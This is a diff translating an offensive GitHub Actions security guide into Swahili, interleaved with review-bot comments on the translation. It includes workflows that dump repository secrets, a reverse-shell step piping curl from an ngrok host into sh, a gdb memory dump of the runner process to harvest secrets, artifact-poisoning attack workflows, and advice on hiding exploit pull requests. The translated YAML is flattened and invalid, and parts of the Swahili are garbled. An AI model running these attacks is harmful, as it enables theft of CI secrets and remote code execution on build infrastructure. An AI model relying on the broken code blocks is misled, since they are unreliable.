- -d '{"head":"","base":"master", "title":"title"}'
+-H "Accept: application/vnd.github.v3+json" \
+--header "authorization: Bearer $GITHUB_TOKEN" \
+--header 'content-type: application/json' \
+https://api.github.com/repos///pulls \
+-d '{"head":"","base":"master", "title":"title"}'
```
-
{{#endtab }}
{{#endtabs }}
> [!CAUTION]
-> Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization.
+> Kumbuka kwamba katika matukio kadhaa utaweza kupata **tokens za mtumiaji wa github ndani ya mazingira ya Github Actions au katika siri**. Tokens hizi zinaweza kukupa mamlaka zaidi juu ya hifadhi na shirika.
-List secrets in Github Action output
-
+Orodha ya siri katika matokeo ya Github Action
```yaml
name: list_env
on:
- workflow_dispatch: # Launch manually
- pull_request: #Run it when a PR is created to a branch
- branches:
- - "**"
- push: # Run it when a push is made to a branch
- branches:
- - "**"
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- "**"
+push: # Run it when a push is made to a branch
+branches:
+- "**"
jobs:
- List_env:
- runs-on: ubuntu-latest
- steps:
- - name: List Env
- # Need to base64 encode or github will change the secret value for "***"
- run: sh -c 'env | grep "secret_" | base64 -w0'
- env:
- secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
- secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+List_env:
+runs-on: ubuntu-latest
+steps:
+- name: List Env
+# Need to base64 encode or github will change the secret value for "***"
+run: sh -c 'env | grep "secret_" | base64 -w0'
+env:
+secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
```
-
-Get reverse shell with secrets
-
+Pata shell ya kinyume na siri
```yaml
name: revshell
on:
- workflow_dispatch: # Launch manually
- pull_request: #Run it when a PR is created to a branch
- branches:
- - "**"
- push: # Run it when a push is made to a branch
- branches:
- - "**"
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- "**"
+push: # Run it when a push is made to a branch
+branches:
+- "**"
jobs:
- create_pull_request:
- runs-on: ubuntu-latest
- steps:
- - name: Get Rev Shell
- run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
- env:
- secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
- secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+create_pull_request:
+runs-on: ubuntu-latest
+steps:
+- name: Get Rev Shell
+run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
+env:
+secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
```
-
-It's possible to check the permissions given to a Github Token in other users repositories **checking the logs** of the actions:
+Inawezekana kuangalia ruhusa zilizotolewa kwa Github Token katika hifadhi za watumiaji wengine **kwa kuangalia kumbukumbu** za vitendo:
-## Allowed Execution
+## Utekelezaji Ulioidhinishwa
> [!NOTE]
-> This would be the easiest way to compromise Github actions, as this case suppose that you have access to **create a new repo in the organization**, or have **write privileges over a repository**.
+> Hii ingekuwa njia rahisi zaidi ya kuathiri vitendo vya Github, kwani kesi hii inadhani kuwa una uf access **kuunda hifadhi mpya katika shirika**, au una **haki za kuandika juu ya hifadhi**.
>
-> If you are in this scenario you can just check the [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action).
+> Ikiwa uko katika hali hii unaweza tu kuangalia [Mbinu za Baada ya Utekelezaji](./#post-exploitation-techniques-from-inside-an-action).
-### Execution from Repo Creation
+### Utekelezaji Kutoka kwa Uundaji wa Hifadhi
-In case members of an organization can **create new repos** and you can execute github actions, you can **create a new repo and steal the secrets set at organization level**.
+Katika kesi ambapo wanachama wa shirika wanaweza **kuunda hifadhi mpya** na unaweza kutekeleza vitendo vya github, unaweza **kuunda hifadhi mpya na kuiba siri zilizowekwa katika kiwango cha shirika**.
-### Execution from a New Branch
+### Utekelezaji Kutoka kwa Tawi Jipya
-If you can **create a new branch in a repository that already contains a Github Action** configured, you can **modify** it, **upload** the content, and then **execute that action from the new branch**. This way you can **exfiltrate repository and organization level secrets** (but you need to know how they are called).
-
-You can make the modified action executable **manually,** when a **PR is created** or when **some code is pushed** (depending on how noisy you want to be):
+Ikiwa unaweza **kuunda tawi jipya katika hifadhi ambayo tayari ina Github Action** iliyowekwa, unaweza **kubadilisha** hiyo, **kupakia** maudhui, na kisha **kutekeleza kitendo hicho kutoka kwa tawi jipya**. Kwa njia hii unaweza **kuondoa siri za hifadhi na kiwango cha shirika** (lakini unahitaji kujua zinaitwaje).
+Unaweza kufanya kitendo kilichobadilishwa kiwe cha kutekelezeka **kwa mikono,** wakati **PR inaundwa** au wakati **kodi fulani inasukumwa** (kulingana na jinsi unavyotaka kuwa na sauti):
```yaml
on:
- workflow_dispatch: # Launch manually
- pull_request: #Run it when a PR is created to a branch
- branches:
- - master
- push: # Run it when a push is made to a branch
- branches:
- - current_branch_name
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- master
+push: # Run it when a push is made to a branch
+branches:
+- current_branch_name
# Use '**' instead of a branh name to trigger the action in all the cranches
```
-
---
-## Forked Execution
+## Utekelezaji wa Forked
> [!NOTE]
-> There are different triggers that could allow an attacker to **execute a Github Action of another repository**. If those triggerable actions are poorly configured, an attacker could be able to compromise them.
+> Kuna vichocheo tofauti ambavyo vinaweza kumruhusu mshambuliaji **kutekeleza Github Action ya hifadhi nyingine**. Ikiwa vitendo hivyo vinavyoweza kuchochewa havijakamilishwa vizuri, mshambuliaji anaweza kuwa na uwezo wa kuvunja usalama wao.
### `pull_request`
-The workflow trigger **`pull_request`** will execute the workflow every time a pull request is received with some exceptions: by default if it's the **first time** you are **collaborating**, some **maintainer** will need to **approve** the **run** of the workflow:
+Vichocheo vya kazi **`pull_request`** vitatekeleza kazi kila wakati ombi la kuvuta linapopokelewa na baadhi ya visingizio: kwa kawaida ikiwa ni **mara ya kwanza** unapo **shirikiana**, baadhi ya **wasimamizi** watahitaji **kuthibitisha** **kuendesha** kazi hiyo:
> [!NOTE]
-> As the **default limitation** is for **first-time** contributors, you could contribute **fixing a valid bug/typo** and then send **other PRs to abuse your new `pull_request` privileges**.
+> Kwa kuwa **kikomo cha kawaida** ni kwa **watoaji wa mara ya kwanza**, unaweza kuchangia **kurekebisha hitilafu/typo halali** na kisha kutuma **PR nyingine ili kutumia haki zako mpya za `pull_request`**.
>
-> **I tested this and it doesn't work**: ~~Another option would be to create an account with the name of someone that contributed to the project and deleted his account.~~
+> **Nilijaribu hii na haifanyi kazi**: ~~Chaguo lingine lingekuwa kuunda akaunti kwa jina la mtu ambaye alichangia kwenye mradi na kufuta akaunti yake.~~
-Moreover, by default **prevents write permissions** and **secrets access** to the target repository as mentioned in the [**docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories):
+Zaidi ya hayo, kwa kawaida **inazuia ruhusa za kuandika** na **ufikiaji wa siri** kwa hifadhi lengwa kama ilivyoelezwa katika [**nyaraka**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories):
-> With the exception of `GITHUB_TOKEN`, **secrets are not passed to the runner** when a workflow is triggered from a **forked** repository. The **`GITHUB_TOKEN` has read-only permissions** in pull requests **from forked repositories**.
+> Kwa kutengwa kwa `GITHUB_TOKEN`, **siri hazipitishwi kwa mchezaji** wakati kazi inachochewa kutoka hifadhi **forked**. **`GITHUB_TOKEN` ina ruhusa za kusoma tu** katika ombi la kuvuta **kutoka hifadhi za forked**.
-An attacker could modify the definition of the Github Action in order to execute arbitrary things and append arbitrary actions. However, he won't be able to steal secrets or overwrite the repo because of the mentioned limitations.
+Mshambuliaji anaweza kubadilisha ufafanuzi wa Github Action ili kutekeleza mambo yasiyo na mipaka na kuongeza vitendo vya kiholela. Hata hivyo, hataweza kuiba siri au kufuta repo kwa sababu ya vikwazo vilivyotajwa.
> [!CAUTION]
-> **Yes, if the attacker change in the PR the github action that will be triggered, his Github Action will be the one used and not the one from the origin repo!**
+> **Ndio, ikiwa mshambuliaji atabadilisha katika PR github action itakayochochewa, Github Action yake itakuwa ndiyo itakayotumika na si ile kutoka hifadhi ya asili!**
-As the attacker also controls the code being executed, even if there aren't secrets or write permissions on the `GITHUB_TOKEN` an attacker could for example **upload malicious artifacts**.
+Kwa kuwa mshambuliaji pia anadhibiti msimbo unaotekelezwa, hata kama hakuna siri au ruhusa za kuandika kwenye `GITHUB_TOKEN`, mshambuliaji anaweza kwa mfano **kupakia vitu vya uharibifu**.
### **`pull_request_target`**
-The workflow trigger **`pull_request_target`** have **write permission** to the target repository and **access to secrets** (and doesn't ask for permission).
+Vichocheo vya kazi **`pull_request_target`** vina **ruhusa za kuandika** kwa hifadhi lengwa na **ufikiaji wa siri** (na havihitaji ruhusa).
-Note that the workflow trigger **`pull_request_target`** **runs in the base context** and not in the one given by the PR (to **not execute untrusted code**). For more info about `pull_request_target` [**check the docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\
-Moreover, for more info about this specific dangerous use check this [**github blog post**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/).
+Kumbuka kwamba vichocheo vya kazi **`pull_request_target`** **vinakimbia katika muktadha wa msingi** na si katika ile iliyotolewa na PR (ili **kutoendesha msimbo usioaminika**). Kwa maelezo zaidi kuhusu `pull_request_target` [**angalia nyaraka**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\
+Zaidi ya hayo, kwa maelezo zaidi kuhusu matumizi haya hatari maalum angalia hii [**blogu ya github**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/).
-It might look like because the **executed workflow** is the one defined in the **base** and **not in the PR** it's **secure** to use **`pull_request_target`**, but there are a **few cases were it isn't**.
+Inaweza kuonekana kuwa kwa sababu **kazi inayotekelezwa** ni ile iliyofafanuliwa katika **msingi** na **siyo katika PR** ni **salama** kutumia **`pull_request_target`**, lakini kuna **mifano michache ambapo si salama**.
-An this one will have **access to secrets**.
+Na hii itakuwa na **ufikiaji wa siri**.
### `workflow_run`
-The [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) trigger allows to run a workflow from a different one when it's `completed`, `requested` or `in_progress`.
-
-In this example, a workflow is configured to run after the separate "Run Tests" workflow completes:
+Vichocheo vya [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) vinaruhusu kuendesha kazi kutoka nyingine wakati imekamilika, imeombwa au inaendelea.
+Katika mfano huu, kazi imewekwa ili kuendesha baada ya kazi tofauti "Run Tests" kukamilika:
```yaml
on:
- workflow_run:
- workflows: [Run Tests]
- types:
- - completed
+workflow_run:
+workflows: [Run Tests]
+types:
+- completed
```
-
Moreover, according to the docs: The workflow started by the `workflow_run` event is able to **access secrets and write tokens, even if the previous workflow was not**.
This kind of workflow could be attacked if it's **depending** on a **workflow** that can be **triggered** by an external user via **`pull_request`** or **`pull_request_target`**. A couple of vulnerable examples can be [**found this blog**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** The first one consist on the **`workflow_run`** triggered workflow downloading out the attackers code: `${{ github.event.pull_request.head.sha }}`\
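Review bot: every workflow YAML in this hunk is flattened to column 0 (`workflow_dispatch:`, `branches:`, `- "**"`, `List_env:`, `runs-on:`, `steps:`, `env:`, `workflow_run:`, `types:` ...), which is not valid for the `on:`/`jobs:` structure it is meant to show: `on:` and `jobs:` become empty keys and `branches:` ends up as a sibling of `pull_request:`/`push:` rather than their child, so GitHub would reject these examples. Restore the nesting from the removed lines; the `curl` continuation lines lost their indent too, which is harmless thanks to the trailing `\` but inconsistent with the rest of the book. Translation consistency: `{{#tab name="Unda PR" }}` is translated while `Merge PR` and `Approve PR` are not; `una uf access **kuunda hifadhi mpya...` contains the garbled token `uf access` where `ufikiaji` appears to be intended; `siri hazipitishwi kwa mchezaji` renders "runner" as `mchezaji` (player), where `runner` should stay as the technical term; and in the `workflow_run` paragraph the event types `completed`, `requested` and `in_progress` were translated to `imekamilika, imeombwa au inaendelea` and lost their backticks, although they are the literal values of the `types:` key in the snippet that follows and must stay as-is. Pre-existing in both versions, worth fixing while touching these lines: `${{secrets.POSTGRESS_PASSWORDyaml}}` carries a stray `yaml` suffix on the secret name in both the list_env and revshell examples.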
@@ -257,30 +243,30 @@ In case of a workflow using **`pull_request_target` or `workflow_run`** that dep
The potentially **untrusted code is being run during `npm install` or `npm build`** as the build scripts and referenced **packages are controlled by the author of the PR**.
@@ -315,78 +301,74 @@ As mentioned in [**this blog post**](https://www.legitsecurity.com/blog/github-a
The thing problem is that if the **`path`** parameter isn't set, the artifact is extracted in the current directory and it can override files that could be later used or even executed in the workflow. Therefore, if the Artifact is vulnerable, an attacker could abuse this to compromise other workflows trusting the Artifact.
Example of vulnerable workflow:
-
```yaml
on:
- workflow_run:
- workflows: ["some workflow"]
- types:
- - completed
+workflow_run:
+workflows: ["some workflow"]
+types:
+- completed
jobs:
- success:
- runs-on: ubuntu-latest
- steps:
- - uses: actions/checkout@v2
- - name: download artifact
- uses: dawidd6/action-download-artifact
- with:
- workflow: ${{ github.event.workflow_run.workflow_id }}
- name: artifact
- - run: python ./script.py
- with:
- name: artifact
- path: ./script.py
+success:
+runs-on: ubuntu-latest
+steps:
+- uses: actions/checkout@v2
+- name: download artifact
+uses: dawidd6/action-download-artifact
+with:
+workflow: ${{ github.event.workflow_run.workflow_id }}
+name: artifact
+- run: python ./script.py
+with:
+name: artifact
+path: ./script.py
```
-
-This could be attacked with this workflow:
-
+Hii inaweza kushambuliwa kwa kutumia mchakato huu:
```yaml
name: "some workflow"
on: pull_request
jobs:
- upload:
- runs-on: ubuntu-latest
- steps:
- - run: echo "print('exploited')" > ./script.py
- - uses actions/upload-artifact@v2
- with:
- name: artifact
- path: ./script.py
+upload:
+runs-on: ubuntu-latest
+steps:
+- run: echo "print('exploited')" > ./script.py
+- uses actions/upload-artifact@v2
+with:
+name: artifact
+path: ./script.py
```
-
---
-## Other External Access
+## Mtu Mwingine wa Nje
-### Deleted Namespace Repo Hijacking
+### Utekaji wa Repo ya Namespace Iliyofutwa
-If an account changes it's name another user could register an account with that name after some time. If a repository had **less than 100 stars previously to the change of nam**e, Github will allow the new register user with the same name to create a **repository with the same name** as the one deleted.
+Ikiwa akaunti inabadilisha jina lake, mtumiaji mwingine anaweza kujiandikisha na akaunti yenye jina hilo baada ya muda fulani. Ikiwa repo ilikuwa na **nyota chini ya 100 kabla ya kubadilisha jina**, Github itaruhusu mtumiaji mpya aliyejiandikisha kwa jina hilo kuunda **repo yenye jina sawa** na ile iliyofutwa.
> [!CAUTION]
-> So if an action is using a repo from a non-existent account, it's still possible that an attacker could create that account and compromise the action.
+> Hivyo basi ikiwa hatua inatumia repo kutoka kwa akaunti isiyokuwepo, bado inawezekana kwamba mshambuliaji anaweza kuunda akaunti hiyo na kuathiri hatua hiyo.
-If other repositories where using **dependencies from this user repos**, an attacker will be able to hijack them Here you have a more complete explanation: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
+Ikiwa repo nyingine zilikuwa zikitumika **kutegemea kutoka kwa repo za mtumiaji huyu**, mshambuliaji ataweza kuzikamata. Hapa kuna maelezo kamili zaidi: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
---
-## Repo Pivoting
+## Uhamasishaji wa Repo
> [!NOTE]
-> In this section we will talk about techniques that would allow to **pivot from one repo to another** supposing we have some kind of access on the first one (check the previous section).
+> Katika sehemu hii tutazungumzia mbinu ambazo zitaruhusu **kuhamasisha kutoka repo moja hadi nyingine** tukidhani tuna aina fulani ya ufikiaji kwenye ya kwanza (angalia sehemu iliyopita).
-### Cache Poisoning
+### Upoison wa Cache
-A cache is maintained between **wokflow runs in the same branch**. Which means that if an attacker **compromise** a **package** that is then stored in the cache and **downloaded** and executed by a **more privileged** workflow he will be able to **compromise** also that workflow.
+Cache inatunzwa kati ya **mizunguko ya workflow katika tawi moja**. Hii ina maana kwamba ikiwa mshambuliaji **anaathiri** **kifurushi** ambacho kisha kinahifadhiwa kwenye cache na **kupakuliwa** na kutekelezwa na **workflow yenye mamlaka zaidi**, ataweza pia **kuathiri** workflow hiyo.
{{#ref}}
gh-actions-cache-poisoning.md
{{#endref}}
-### Artifact Poisoning
+### Upoison wa Kazi
-Workflows could use **artifacts from other workflows and even repos**, if an attacker manages to **compromise** the Github Action that **uploads an artifact** that is later used by another workflow he could **compromise the other workflows**:
+Workflows zinaweza kutumia **kazi kutoka kwa workflows nyingine na hata repos**, ikiwa mshambuliaji anafanikiwa **kuathiri** Github Action inayopakia **kazi** ambayo baadaye inatumika na workflow nyingine, anaweza **kuathiri workflows nyingine**:
{{#ref}}
gh-actions-artifact-poisoning.md
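Review bot: the `+` lines of both YAML blocks in this hunk drop all indentation, so keys that were nested under `on:` and `jobs:` in the removed lines now sit at column 0 (`+workflow_run:`, `+- completed`, `+runs-on: ubuntu-latest`), which makes the "vulnerable workflow" and the attacking workflow invalid or wrongly structured YAML; restore the nesting from the `-` lines so the translated page still shows the exact artifact-overwrite pattern the text describes. The translated headings also lose their meaning: `## Mtu Mwingine wa Nje` reads as "another external person" rather than "Other External Access", and `### Upoison wa Kazi` / `## Uhamasishaji wa Repo` are not recognisable renderings of "Artifact Poisoning" and "Repo Pivoting"; keep the established English terms in the headings (as the hunk already does for `Cache`, `OIDC` and `workflow_run`) so readers can match them to the referenced sub-pages `gh-actions-artifact-poisoning.md` and `gh-actions-cache-poisoning.md`.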
@@ -394,11 +376,11 @@ gh-actions-artifact-poisoning.md
---
-## Post Exploitation from an Action
+## Baada ya Kutekeleza kutoka kwa Hatua
-### Accessing AWS and GCP via OIDC
+### Kufikia AWS na GCP kupitia OIDC
-Check the following pages:
+Angalia kurasa zifuatazo:
{{#ref}}
../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
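Review bot: `+## Baada ya Kutekeleza kutoka kwa Hatua` renders "Post Exploitation from an Action" as roughly "after executing from a step", which loses the post-exploitation meaning; keep the technical term untranslated in the heading, as the next heading in this hunk already does with `+### Kufikia AWS na GCP kupitia OIDC`.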
@@ -408,148 +390,138 @@ Check the following pages:
../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md
{{#endref}}
-### Accessing secrets
+### Kufikia siri
-If you are injecting content into a script it's interesting to know how you can access secrets:
+Ikiwa unachanganya maudhui kwenye script, ni muhimu kujua jinsi unavyoweza kufikia siri:
-- If the secret or token is set to an **environment variable**, it can be directly accessed through the environment using **`printenv`**.
+- Ikiwa siri au token imewekwa kwenye **kigezo cha mazingira**, inaweza kufikiwa moja kwa moja kupitia mazingira kwa kutumia **`printenv`**.
-List secrets in Github Action output
-
+Orodha ya siri katika matokeo ya Github Action
```yaml
name: list_env
on:
- workflow_dispatch: # Launch manually
- pull_request: #Run it when a PR is created to a branch
- branches:
- - '**'
- push: # Run it when a push is made to a branch
- branches:
- - '**'
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- '**'
+push: # Run it when a push is made to a branch
+branches:
+- '**'
jobs:
- List_env:
- runs-on: ubuntu-latest
- steps:
- - name: List Env
- # Need to base64 encode or github will change the secret value for "***"
- run: sh -c 'env | grep "secret_" | base64 -w0'
- env:
- secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+List_env:
+runs-on: ubuntu-latest
+steps:
+- name: List Env
+# Need to base64 encode or github will change the secret value for "***"
+run: sh -c 'env | grep "secret_" | base64 -w0'
+env:
+secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
- secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
```
-
-Get reverse shell with secrets
-
+Pata shell ya kinyume na siri
```yaml
name: revshell
on:
- workflow_dispatch: # Launch manually
- pull_request: #Run it when a PR is created to a branch
- branches:
- - "**"
- push: # Run it when a push is made to a branch
- branches:
- - "**"
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- "**"
+push: # Run it when a push is made to a branch
+branches:
+- "**"
jobs:
- create_pull_request:
- runs-on: ubuntu-latest
- steps:
- - name: Get Rev Shell
- run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
- env:
- secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
- secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+create_pull_request:
+runs-on: ubuntu-latest
+steps:
+- name: Get Rev Shell
+run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
+env:
+secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
```
-
-- If the secret is used **directly in an expression**, the generated shell script is stored **on-disk** and is accessible.
- - ```bash
- cat /home/runner/work/_temp/*
- ```
-- For a JavaScript actions the secrets and sent through environment variables
- - ```bash
- ps axe | grep node
- ```
-- For a **custom action**, the risk can vary depending on how a program is using the secret it obtained from the **argument**:
+- Ikiwa siri inatumika **moja kwa moja katika muktadha**, skripti ya shell iliyotengenezwa inahifadhiwa **kwenye diski** na inapatikana.
+- ```bash
+cat /home/runner/work/_temp/*
+```
+- Kwa hatua za JavaScript, siri zinatumwa kupitia mabadiliko ya mazingira
+- ```bash
+ps axe | grep node
+```
+- Kwa **hatua maalum**, hatari inaweza kutofautiana kulingana na jinsi programu inavyotumia siri iliyoipata kutoka kwa **hoja**:
- ```yaml
- uses: fakeaction/publish@v3
- with:
- key: ${{ secrets.PUBLISH_KEY }}
- ```
+```yaml
+uses: fakeaction/publish@v3
+with:
+key: ${{ secrets.PUBLISH_KEY }}
+```
-### Abusing Self-hosted runners
+### Kutumia Runners za Kujihudumia
-The way to find which **Github Actions are being executed in non-github infrastructure** is to search for **`runs-on: self-hosted`** in the Github Action configuration yaml.
+Njia ya kupata ni zipi **Github Actions zinafanywa katika miundombinu isiyo ya github** ni kutafuta **`runs-on: self-hosted`** katika usanidi wa yaml wa Github Action.
-**Self-hosted** runners might have access to **extra sensitive information**, to other **network systems** (vulnerable endpoints in the network? metadata service?) or, even if it's isolated and destroyed, **more than one action might be run at the same time** and the malicious one could **steal the secrets** of the other one.
-
-In self-hosted runners it's also possible to obtain the **secrets from the \_Runner.Listener**\_\*\* process\*\* which will contain all the secrets of the workflows at any step by dumping its memory:
+**Runners za kujihudumia** zinaweza kuwa na ufikiaji wa **habari nyeti zaidi**, kwa mifumo mingine ya **mtandao** (nukta dhaifu katika mtandao? huduma ya metadata?) au, hata kama imejitengea na kuharibiwa, **hatua zaidi ya moja zinaweza kufanywa kwa wakati mmoja** na ile mbaya inaweza **kuiba siri** za nyingine.
+Katika runners za kujihudumia pia inawezekana kupata **siri kutoka kwa \_Runner.Listener**\_\*\* mchakato\*\* ambao utakuwa na siri zote za kazi katika hatua yoyote kwa kutupa kumbukumbu yake:
```bash
sudo apt-get install -y gdb
sudo gcore -o k.dump "$(ps ax | grep 'Runner.Listener' | head -n 1 | awk '{ print $1 }')"
```
-
-Check [**this post for more information**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/).
+Check [**hii posti kwa maelezo zaidi**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/).
### Github Docker Images Registry
-It's possible to make Github actions that will **build and store a Docker image inside Github**.\
-An example can be find in the following expandable:
+Inawezekana kuunda Github actions ambazo **zitajenga na kuhifadhi picha ya Docker ndani ya Github**.\
+Mfano unaweza kupatikana katika ifuatayo inayoweza kupanuliwa:
Github Action Build & Push Docker Image
-
```yaml
[...]
- name: Set up Docker Buildx
- uses: docker/setup-buildx-action@v1
+uses: docker/setup-buildx-action@v1
- name: Login to GitHub Container Registry
- uses: docker/login-action@v1
- with:
- registry: ghcr.io
- username: ${{ github.repository_owner }}
- password: ${{ secrets.ACTIONS_TOKEN }}
+uses: docker/login-action@v1
+with:
+registry: ghcr.io
+username: ${{ github.repository_owner }}
+password: ${{ secrets.ACTIONS_TOKEN }}
- name: Add Github Token to Dockerfile to be able to download code
- run: |
- sed -i -e 's/TOKEN=##VALUE##/TOKEN=${{ secrets.ACTIONS_TOKEN }}/g' Dockerfile
+run: |
+sed -i -e 's/TOKEN=##VALUE##/TOKEN=${{ secrets.ACTIONS_TOKEN }}/g' Dockerfile
- name: Build and push
- uses: docker/build-push-action@v2
- with:
- context: .
- push: true
- tags: |
- ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:latest
- ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ env.GITHUB_NEWXREF }}-${{ github.sha }}
+uses: docker/build-push-action@v2
+with:
+context: .
+push: true
+tags: |
+ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:latest
+ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ env.GITHUB_NEWXREF }}-${{ github.sha }}
[...]
```
-
-As you could see in the previous code, the Github registry is hosted in **`ghcr.io`**.
-
-A user with read permissions over the repo will then be able to download the Docker Image using a personal access token:
+Kama unavyoona katika msimbo uliopita, usajili wa Github unahifadhiwa katika **`ghcr.io`**.
+Mtumiaji mwenye ruhusa za kusoma juu ya repo basi ataweza kupakua Picha ya Docker akitumia tokeni ya ufikiaji wa kibinafsi:
```bash
echo $gh_token | docker login ghcr.io -u --password-stdin
docker pull ghcr.io//:
```
-
Then, the user could search for **leaked secrets in the Docker image layers:**
{{#ref}}
@@ -558,20 +530,20 @@ https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-m
### Sensitive info in Github Actions logs
-Even if **Github** try to **detect secret values** in the actions logs and **avoid showing** them, **other sensitive data** that could have been generated in the execution of the action won't be hidden. For example a JWT signed with a secret value won't be hidden unless it's [specifically configured](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret).
+Hata kama **Github** inajaribu **kubaini thamani za siri** katika rekodi za hatua na **kuepuka kuonyesha** hizo, **data nyeti nyingine** ambazo zinaweza kuwa zimeundwa katika utekelezaji wa hatua hiyo hazitafichwa. Kwa mfano, JWT iliyosainiwa kwa thamani ya siri haitafichwa isipokuwa [imewekwa maalum](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret).
## Covering your Tracks
-(Technique from [**here**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) First of all, any PR raised is clearly visible to the public in Github and to the target GitHub account. In GitHub by default, we **canāt delete a PR of the internet**, but there is a twist. For Github accounts that are **suspended** by Github, all of their **PRs are automatically deleted** and removed from the internet. So in order to hide your activity you need to either get your **GitHub account suspended or get your account flagged**. This would **hide all your activities** on GitHub from the internet (basically remove all your exploit PR)
+(Technique from [**here**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) Kwanza kabisa, PR yoyote iliyoinuliwa inaonekana wazi kwa umma katika Github na kwa akaunti ya lengo ya GitHub. Katika GitHub kwa kawaida, **hatuwezi kufuta PR ya mtandao**, lakini kuna mabadiliko. Kwa akaunti za Github ambazo zime **simamishwa** na Github, **PR zao zote zinafuta moja kwa moja** na kuondolewa kutoka mtandao. Hivyo ili kuficha shughuli zako unahitaji ama kupata **akaunti yako ya GitHub isimamishwe au kupata akaunti yako iwe na alama**. Hii it **ficha shughuli zako zote** kwenye GitHub kutoka mtandao (kimsingi kuondoa PR zako zote za unyakuzi)
-An organization in GitHub is very proactive in reporting accounts to GitHub. All you need to do is share āsome stuffā in Issue and they will make sure your account is suspended in 12 hours :p and there you have, made your exploit invisible on github.
+Shirika katika GitHub lina ufanisi mkubwa katika kuripoti akaunti kwa GitHub. Unachohitaji kufanya ni kushiriki "mambo fulani" katika Issue na watakikisha akaunti yako imesimamishwa ndani ya masaa 12 :p na hapo umepata, umefanya unyakuzi wako usionekane kwenye github.
> [!WARNING]
-> The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed.
+> Njia pekee kwa shirika kugundua kuwa wamekuwa wakilengwa ni kuangalia rekodi za GitHub kutoka SIEM kwani kutoka UI ya GitHub PR itakuwa imeondolewa.
## Tools
-The following tools are useful to find Github Action workflows and even find vulnerable ones:
+Zana zifuatazo ni muhimu kupata Github Action workflows na hata kupata zile zenye udhaifu:
- [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven)
- [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato)
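Review bot: as in the earlier hunk, every translated YAML block here is flattened to column 0 (`+workflow_dispatch:` directly under `on:`, `+List_env:` directly under `jobs:`, `+- name: List Env` followed by an unindented `+run:` and `+env:`), so the `list_env` and `revshell` workflows and the Docker build-and-push snippet are no longer valid YAML and the `env:` secrets would not be attached to the step they are meant to leak from; restore the indentation from the removed lines. The nested list items are broken the same way: `+- ```bash` is followed by an unindented `+cat /home/runner/work/_temp/*` and a bare closing fence, which CommonMark will not keep inside the list item, so the "where secrets end up on disk / in the node process" bullets will render as stray fences. Two smaller points: `+Check [**hii posti kwa maelezo zaidi**]` is left half in English, and `+Katika runners za kujihudumia pia inawezekana kupata **siri kutoka kwa \_Runner.Listener**\_\*\* mchakato\*\*` copies the broken escaping of the original instead of writing `**Runner.Listener process**` (`**mchakato wa Runner.Listener**`) cleanly.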
